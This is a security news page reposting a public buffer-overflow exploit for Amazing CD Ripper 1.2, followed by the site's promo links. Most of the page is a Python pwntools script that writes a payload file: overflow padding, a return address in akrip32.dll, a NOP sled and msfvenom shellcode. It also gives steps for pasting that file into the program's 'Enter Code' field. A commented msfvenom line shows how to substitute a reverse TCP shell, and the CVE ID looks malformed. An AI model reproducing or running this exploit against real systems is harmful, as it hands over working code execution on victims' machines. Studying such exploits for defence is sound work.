Home Tools Exploits & CVE's Amazing CD Ripper 1.2 Buffer Overflow

Amazing CD Ripper 1.2 Buffer Overflow

March 21, 2022

582

Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.

# Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow 
# Exploit Author: Hejap Zairy
# Date: 03.08.2022
# Software Link:   http://www.shelltoys.com/cd_ripper.exe
# Software Link:   https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author  Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python

from pwn import *

buffer = "x41" * 1016 
#  0x100017a1 : push esp # ret  | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:Program Files (x86)ShelltoysAmazing CD Ripperakrip32.dll)

push_esp  =  p32(0x100017a1) #push esp ret ret from  akrip32.dll
nops =  "x90" * 15 #515 tshhh theardlooo love Malware 
#msfvenom   --arch x64  windows/x64/shell_reverse_tcp  lhost=ip lport=443      -f python -e x64/shikata_ga_nai  -b "x00x0ax0dx20xff"  
#msfvenom  --arch x64  -p windows/x64/messagebox   TEXT="0day Hejap Zairy"  -f python -e x64/shikata_ga_nai  EXITFUNC=thread -b "x00x0ax0dx20xff"
buf =  b""
buf += b"xfcx48x81xe4xf0xffxffxffxe8xd0x00x00x00"
buf += b"x41x51x41x50x52x51x56x48x31xd2x65x48x8b"
buf += b"x52x60x3ex48x8bx52x18x3ex48x8bx52x20x3e"
buf += b"x48x8bx72x50x3ex48x0fxb7x4ax4ax4dx31xc9"
buf += b"x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9"
buf += b"x0dx41x01xc1xe2xedx52x41x51x3ex48x8bx52"
buf += b"x20x3ex8bx42x3cx48x01xd0x3ex8bx80x88x00"
buf += b"x00x00x48x85xc0x74x6fx48x01xd0x50x3ex8b"
buf += b"x48x18x3ex44x8bx40x20x49x01xd0xe3x5cx48"
buf += b"xffxc9x3ex41x8bx34x88x48x01xd6x4dx31xc9"
buf += b"x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0"
buf += b"x75xf1x3ex4cx03x4cx24x08x45x39xd1x75xd6"
buf += b"x58x3ex44x8bx40x24x49x01xd0x66x3ex41x8b"
buf += b"x0cx48x3ex44x8bx40x1cx49x01xd0x3ex41x8b"
buf += b"x04x88x48x01xd0x41x58x41x58x5ex59x5ax41"
buf += b"x58x41x59x41x5ax48x83xecx20x41x52xffxe0"
buf += b"x58x41x59x5ax3ex48x8bx12xe9x49xffxffxff"
buf += b"x5dx49xc7xc1x00x00x00x00x3ex48x8dx95x1a"
buf += b"x01x00x00x3ex4cx8dx85x2bx01x00x00x48x31"
buf += b"xc9x41xbax45x83x56x07xffxd5xbbxe0x1dx2a"
buf += b"x0ax41xbaxa6x95xbdx9dxffxd5x48x83xc4x28"
buf += b"x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72"
buf += b"x6fx6ax00x59x41x89xdaxffxd5x30x64x61x79"
buf += b"x20x48x65x6ax61x70x20x5ax61x69x72x79x00"
buf += b"x4dx65x73x73x61x67x65x42x6fx78x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer  + push_esp + nops + buf + padding
try:
    with open("0day_Hejap.txt","wb") as f:
        print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
        f.write(payload)
        f.close()
        print("[+] File created!")
except:
    print("[-]File cannot be created")


# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png

Amazing CD Ripper 1.2 Buffer Overflow

Follow us on Instagram @thecyberpost

EDITOR PICKS

FBI, Europol Say Akira Ransomware Has Drained $42M from 250 Firms

Ukrainian soldiers’ apps increasingly targeted for spying, cyber agency warns

Telecom giant Frontier shuts down some systems after cyberattack

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Grawlix 1.5.1 Cross Site Scripting

Rock RMS File Upload / Account Takeover / Information Disclosure

Chrome ConvertToJavaBitmap Heap Buffer Overflow